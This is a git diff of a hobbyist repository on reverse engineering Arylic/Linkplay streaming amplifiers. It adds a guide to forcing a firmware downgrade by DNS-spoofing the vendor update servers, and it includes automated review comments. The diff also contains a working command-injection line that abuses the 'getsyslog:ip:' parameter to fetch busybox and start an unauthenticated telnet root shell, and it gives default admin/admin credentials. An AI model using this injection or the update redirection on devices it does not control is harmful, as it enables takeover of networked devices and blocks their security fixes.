diff --git a/Downgrade.md b/Downgrade.md new file mode 100644 index 0000000..1409f68 --- /dev/null +++ b/Downgrade.md 
@@ -0,0 +1,224 @@ +# Downgrade Firmware +In recent versions Arylic has fixed several vulnerabilities and I have not found a way to "hack" into the CLI anymore. Telnet acces was still possible with version 4.2.8020 from 2020/02/20 (20th of Feb 2020) that was installed when I had bought the first devices. + +The following information is specific for Arylic Up2Stream Amp v2 and Up2Stream Pro v3, but might also help for other devices. + +## Firmware Upgrade +Before we are able to downgrade the software, it is important to understand the firmware upgrade process. + +The URL to the upgrade server can be retrieved via API: +``` +curl http://10.1.1.52/httpapi.asp?command=GetUpdateServer +# my device responds with http://silenceota.linkplay.com/wifi_audio_image +``` + +With Wireshark I have sniffed how the upgrade process is working and which files are required. At first the device gets a list of all (or many) Linkplay products +``` +curl -O http://silenceota.linkplay.com/wifi_audio_image/products.xml +``` +The XML file contains a list of products with their ID and some information including an URL for specific information. The example contains the two devices listed above (list was retrieved in Oct 2020): +``` + +... + +RP0011_WB60 +WiiMu-A31 +FF31F09E + +http://ota.rakoit.com/release/RP0011_WB60/product.xml + + + +... 
+ +``` + +The following table lists some of the IDs +| Product ID | Description | +| --------------- | ------------- | +| RP0011_WB60 | Arylic WiFi and Bluetooth 5.0 HiFi Stereo Amplifier Board Up2Stream amp 2.0 | +| RP0011_WB60_S | Arylic A30 Pro | +| RP0016_S50PRO_S | Arylic S50 Pro | +| UP2STREAM_PRO_V3 | Arylic Up2Stream Pro v3 | + +``` +curl -O http://ota.rakoit.com/release/RP0011_WB60/product.xml +``` +The example was downloaded in Oct 2020: +``` + + + 20201026 + cfcf8f10e461c886ef39212d666b5492 + http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/20201026/md5.txt + http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/20201026/MVver_20201026 + http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/20201026/layout + http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/uboot_v632.img + http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/backup_new_v1141.img + http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/20201026/a31rakoit_new_uImage_20201026 + http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/20201026/user.jffs2 + http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/20201026/user2.jffs2 + + RP0011_WB60 + 24 + 672498 + http://ota.rakoit.com/release/RP0011_WB60/RP0011_WB60-0024-99617ee3-08182020.mcu.bin + + +``` +The URLs include a "random" ID that might be mapped to the product ID and a subdirectory with the version (date) for some files. The MCU files follow a different structure with the product ID used as a subdirectory and a version number that is included in the name of the image. +| XML ID | Subdirectory | Description | +| --------------- | ------------- | ------------- | +| | | plain text file with MD5 checksums for image files (uBoot, backup, user2, kernel) | +| | | plain text file with version information and release date | +| | | plain text file with layout (e.g. 
offset, size, version, fstype, name, size) of file system in flash (user2, user, kernel) | +| | | main binary image for kernel | +| | | image for user file system (persistent) | +| | | image for user file system (persistent) | +| | - | boot loader uBoot | +| | - | backup image | + +I'm not sure if the **** tag is used. I've modified the URLs (different FQDN and path) and got no error. Only the following files are downloaded during an upgrade (verified with Up2Stream Amp v2.0): +| URL | Description | +| --------------- | ------------- | +| http://silenceota.linkplay.com/wifi_audio_image/products.xml | List of all Linkplay products in XML format with infos and URL | +| http://ota.rakoit.com/release/RP0011_WB60/product.xml | Infos and URLs for images for a specific Linkplay product | +| http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/20201026/MVver_20201026 | Version information | +| http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/20201026/layout | Layout of file system in flash | +| http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/20201026/a31rakoit_new_uImage_20201026 | main image | + +The other images, e.g. uBoot loader (was already installed), user and user2 images were not downloaded. + +> **Note:** +> If an upgrade is available, it may be installed automatically without any notice! In the 4Stream app you might see that a new version is highlighted with "new" and you might get a popup with a notification. I have not found out, when an update is installed automatically. + +## Firmware Downgrade +To be able to downgrade the firmware you need to modify DNS names, e.g. you may install dnsmasq on your local network and point to that DNS server from your DHCP server. 
To redirect the firmware up-/downgrade process to your own webserver, you can create a simple file in the /etc/dnsmasq.d directory with the following content (10.1.1.22 is the IP address of my webserver located on my MacMini) + The following records are required on the DNS server: +``` +cat /etc/dnsmasq.d/linkplay.conf +address=/silenceota.linkplay.com/10.1.1.22 +address=/ota.rakoit.com/10.1.1.22 +``` +You may modify the configuration file on your webserver to use different folders for different FQDNs. Be sure to verify any URLs from a web browser or curl. On your PC you may manually point to a public DNS server to be able to download XML files and images from the Internet. + +> **Note:** +> The modification of the two FQDNs will prevent any further updates! + +A firmware downgrade has been tested from v4.6 to v4.2.8026 (release date 20200220). Here it is documented from v4.2.8826 to v4.2.8026. To get information about the product ID (project), the current version and release date you can use the "getStatusEx" command. The following output is "enhanced" / beautified with the tool "jq" (JSON processor): + +``` +curl -s 'http://10.1.1.52/httpapi.asp?command=getStatusEx' | jq +{ + "language": "en_us", + "ssid": "SoundSystem_305D", + ... + "firmware": "4.2.8826", + "build": "release", + "project": "RP0011_WB60_S", + "priv_prj": "RP0011_WB60_S", + "project_build_name": "a31rakoit", + "Release": "20201026", +``` + +At first you have to download the following XML files, install them in the appropriate directory on your webserver (you may keep the path and create the directories as required). + +> **Important:** +> There is no link to older version available. The **_products.xml_** file only contains URLs for the latest version, so you need to know (or guess) the URL for the specific **_product.xml_** file. The following URL is working for the Up2Stream Amp v2 and partially also for the Up2Stream Pro v3 (without MCU). 
I've added the URL for the **_products.xml_** file to the Wayback archive (https://web.archive.org) on Dec 31th 2023, so it does not work for older versions. + +The **_products.xml_** file that has been archived on 20231231 can be retrieved here: +``` +curl https://web.archive.org/web/20231231141235/http://silenceota.linkplay.com/wifi_audio_image/products.xml +``` + +At first you can download the actual **_products.xml_** file, remove everything except your products, adjust the URLs (optionally) and install it on your web server: +``` +curl -O http://silenceota.linkplay.com/wifi_audio_image/products.xml +``` + +Next you download the specific **_product.xml_** file. The following URL is for the RP0011_WB60_S product ID, but except for the MCU all images look to be the same as for product ID RP0011_WB60, UP2STREAM_PRO_V3, and others. I'm not sure, but all devices with the Linkplay A31 module might use the same firmware. You may download and compare the RP0011_WB60_S product below with your device (including MD5 checksums) and replace MCU part show below with the one from your device. It looks that older versions of the **_product.xml_** files and images are still available for download - you just need to know (or guess) the URLs. + +> **Important:** +> I do not take responsibilities for results or consequences. You might damage your device! Do not try to downgrade your device if you are unsure! 
+ +The following URL is for the RP0011_WB60_S product ID, version 4.2.8020, release date 0200220 +``` +curl -O http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/product.xml +``` + +Here is a copy for reference: +``` + + + 20200220 + 27178fb574eafbdab8e1493a1569dd36 + http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/md5.txt + http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/MVver_20200220 + http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/layout + http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/uboot_v632.img + http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/backup_new_v1141.img + http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/a31rakoit_new_uImage_20200220 + http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/user.jffs2 + http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/user2.jffs2 + + + +RP0011_WB60_S +0022 +670246 +http://silenceota.linkplay.com/wifi_audio_image_mcu/RP0011_WB60_S/RP0011_WB60_S0022.mcu.bin + + +``` + +Modify the in the **_product.xml_** file to be one day ahead of your current release date, e.g. 20201027 if your current release date is 20201026. You may also combine the content with a different MCU (project). Be sure that the project name is exactly matching your device! 
+``` + + + 20201027 + 27178fb574eafbdab8e1493a1569dd36 + http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/md5.txt + http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/MVver_20200220 + http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/layout + http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/uboot_v632.img + http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/backup_new_v1141.img + http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/a31rakoit_new_uImage_20200220 + http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/user.jffs2 + http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/user2.jffs2 + + RP0011_WB60_S + 0022 + 670246 + http://silenceota.linkplay.com/wifi_audio_image_mcu/RP0011_WB60_S/RP0011_WB60_S0022.mcu.bin + + +``` +Download and install all files from the list above on your web server. + +Modifiy the version number in the **_MVver_20200220_** file (first line) to be higher than your current version number, e.g. WiiMu.4.2.8027 if your current version is 4.2.8826. + +Modify the release date in the **_MVver_20200220_** file (6th line) with the same date used in the previous step. + +Here is an example of the modified **_MVver_20200220_** file: +``` + WiiMu.4.2.8827 +WiiMu +WiiMu-A31 +a31rakoit +release +20201027 +customuuid=FF31F09E +``` +Modify the version (ver, 4th column) in the **_layout_** file (4th line) with the same date used in the previous step (here 8827): +``` +#offset :max_size:min_size:ver:flag:fstype:name:img_size +00e00000:00200000:00000040:00000000:2:jffs2:user2:00200000 +00d80000:00080000:00000000:00000000:2:jffs2:user:1 +00250000:00b30000:00000040:00008827:0:null:kernel:8533256 +``` + +Trigger an update with the following commands and verify the progress with Wireshark running on your web server. 
You may use "http" as a filter to see the downgrade process: +``` +curl -s 'http://10.1.1.52/httpapi.asp?command=getMvRemoteUpdateStartCheck +curl -s 'http://10.1.1.52/httpapi.asp?command=getMvRemoteUpdateStatus +``` diff --git a/Hardware.md b/Hardware.md index b464763..4e2904a 100644 --- a/Hardware.md +++ b/Hardware.md @@ -21,6 +21,7 @@ VCEI exceptions : not available Here are some useful links go get more information about the hardware: https://openwrt.org/docs/techref/hardware/soc/soc.mediatek https://openwrt.org/docs/techref/instructionset/mipsel_24kc +https://www.linkplay.com/modules-wi-fi-2 There is an OpenWRT archive where you can get precompiled binaries for almost all utilities you may need: https://archive.openwrt.org/chaos_calmer/15.05/ramips/mt7628/packages/base/ @@ -29,7 +30,7 @@ https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/ The binaries are included in packages, so you have to find out which packages includes a specific binary. A list of packages can be found here: https://archive.openwrt.org/chaos_calmer/15.05/ramips/mt7628/packages/base/Packages -Here's an example how to download a package and get the binaries from it for a SSH server (dropbear). The commands were executed from a terminal window on my MacBook: +Here's an example how to download a package and get the binaries from it for a SSH server (dropbear). The commands were executed from a terminal window on my MacMini: ``` cd ~/Downloads 
@@ -70,7 +71,7 @@ dropbear -r /tmp/rsa_host_key ``` Log in with ssh from remote by using username admin, password admin -I tried to install a sftp server on my Up2Stream device to be able to add the file system via sshfs from my MacBook, but it's not working so far. Here are the commands that I've used: +I tried to install a sftp server on my Up2Stream device to be able to add the file system via sshfs from my MacMini, but it's not working so far. Here are the commands that I've used: ``` cd ~/Downloads curl 'https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/packages/packages/openssh-sftp-server_7.1p2-1_ramips_24kec.ipk' -o openssh-sftp-server_7.1p2-1_ramips_24kec.ipk @@ -90,7 +91,7 @@ wget -O /tmp/bin/sftp-server -T 5 'http://10.1.1.22/a31/sftp-server' chmod 777 /tmp/bin/sftp-server ``` -Goal was to mount the Up2Stream device on my MacBook with sshfs: +Goal was to mount the Up2Stream device on my MacMini with sshfs: ``` sshfs -C -o volname=up2stream -p 22 -o allow_other -o sftp_server=/tmp/bin/sftp-server admin@10.1.1.52:/ ~/Volumes/up2stream ``` diff --git a/README.md b/README.md index a6754f4..813353a 100644 --- a/README.md +++ b/README.md 
@@ -19,12 +19,13 @@ Reverse Engineering by Crymeiriver: https://github.com/Crymeiriver/LS150/blob/master/README.md ## Enable telnetd -To get started exploring these devices, a security vulnerability had to be exploited to install a telnetd. +To get started exploring these devices, a security vulnerability had to be exploited to install a telnetd. [Enable telnetd](/TELNETD.md) ## Hardware and Firmware -More information about the hardware +More information about the hardware and Firmware, file systems, including information how to add binary files the device. [Hardware and Firmware](/Hardware.md) -## +## Reverse Engineering +Information about the boot process, file systems including environment (NVRAM). [Reverse Engineering](/boot-process.md) ## Downgrade Firmware -The first version on my devices was 4.2.8020 from 2020/02/20 (20th of Feb 2020). That version still has some vulnerabilites to be able to get onto the CLI with telnet by pushing a single command to these devices. Although it is good when the vendor is providing upgrades with additional feature and security fixes, I'd still like to be able to "hack" into the CLI. Therefore I had to downgrade the firmware. +The first version on my devices was 4.2.8020 from 2020/02/20 (20th of Feb 2020). That version still has some vulnerabilites to be able to get onto the CLI with telnet by pushing a single command to these devices. Although it is good when the vendor is providing upgrades with additional feature and security fixes, I'd still like to be able to "hack" into the CLI. Therefore I had to downgrade the firmware. [Downgrade Firmware](/Downgrade.md) diff --git a/TELNETD.md b/TELNETD.md index 2aa63b5..bfd9fb9 100644 --- a/TELNETD.md +++ b/TELNETD.md 
@@ -3,7 +3,7 @@ To enable telnetd on these devices, a security vulnerability had to be exploited The command that has this vulnerability is **_"getsyslog"_**, see https://developer.arylic.com/httpapi/#get-system-log and https://labs.withsecure.com/advisories/linkplay-firmware-wanlan-remote-code-execution. The command has an option to add an IP address from a slave device, e.g. **_"getsyslog:ip:10.1.1.90"_**, so a CLI command is executed on the device to retrieve the system log from the slave device that includes the IP address. Instead of just having an IP address as a parameter, that CLI command can also include a ";" and a second CLI command. You do not even have to provide an IP address, but can append the ";" and second command directly after the ":ip:". -The following code snippets are using the IP address 10.1.1.52 for my Arylic Up2Stream Pro v3 device and 10.1.1.22 for a web server running on my local MacBook. +The following code snippets are using the IP address 10.1.1.52 for my Arylic Up2Stream Pro v3 device and 10.1.1.22 for a web server running on my local MacMini. ``` curl "http://10.1.1.52httpapi.asp?command=getsyslog:ip:;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/busybox+-q;chmod+777+/tmp/bin/busybox;/tmp/bin/busybox+telnetd+-l/bin/ash"; ```
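Review bot: in the Downgrade.md hunk the MVver step contradicts its own example: "e.g. WiiMu.4.2.8027 if your current version is 4.2.8826" names a version that is lower than the current one, so the device would not treat it as a newer release; the example file a few lines later correctly shows `WiiMu.4.2.8827`, and the prose should match it. The layout step then says "with the same date used in the previous step (here 8827)", but 8827 is the version number, not the date (20201027); say "the same version number". The two trigger commands at the end are missing their closing single quote (`curl -s 'http://10.1.1.52/httpapi.asp?command=getMvRemoteUpdateStartCheck`), so a shell will wait for more input instead of running them. The XML element names were swallowed by the markdown renderer: the "XML ID" and "Subdirectory" columns of the file table are empty, "I'm not sure if the **** tag is used" and "Modify the in the product.xml file" both lost their tag name, and the quoted products.xml/product.xml listings show only element text; wrap the tag names in backticks so they survive rendering. Version strings are inconsistent (4.2.8020 in the introduction and in "version 4.2.8020, release date 0200220", 4.2.8026 in "tested from v4.6 to v4.2.8026 ... documented from v4.2.8826 to v4.2.8026"), and "0200220" drops a digit of 20200220. Minor wording: "Telnet acces", "Modifiy", "Dec 31th", "replace MCU part show below". On substance, the "Only the following files are downloaded" table shows that md5.txt is never fetched during the observed upgrade and that all metadata and the uImage are retrieved over plain HTTP from whatever host the two names resolve to; say that explicitly so readers do not assume a checksum is verified, and since the dnsmasq `address=` override blocks vendor security updates for every device using that resolver, document that it should be confined to a test network and removed once the downgrade is done.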
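Review bot: in the first Hardware.md hunk (@@ -21,6 +21,7 @@) the unchanged line "Here are some useful links go get more information about the hardware" has a typo ("to get"); since this hunk already edits the link list, fix it in the same change.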
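Review bot: in the Hardware.md hunk at @@ -70,7 +71,7 @@ the rewritten line says "to be able to add the file system via sshfs"; "mount the file system" is what is meant, as the later hunk ("Goal was to mount the Up2Stream device on my MacMini with sshfs") confirms. The context line just above, "Log in with ssh from remote by using username admin, password admin", documents a default credential for a network-reachable dropbear instance; the section should say to change it or restrict access when the device stays on the network.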
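Review bot: in the README.md hunk, "including information how to add binary files the device" is missing "to" ("to the device"), and the rewritten paragraph keeps "vulnerabilites" (vulnerabilities) and "additional feature" (features); since these lines are being changed anyway, fix them here. The new "Reverse Engineering" section links to /boot-process.md, a file this diff does not add; confirm it exists in the repository, as the other sections link files that do (TELNETD.md, Hardware.md, Downgrade.md).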
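Review bot: the TELNETD.md hunk only renames MacBook to MacMini, but the unchanged command below it ends in `telnetd -l/bin/ash`, which starts a telnet service that hands out a shell with no login to anyone who can reach the device; the section should state that plainly and explain how to stop the service once the exploration is finished.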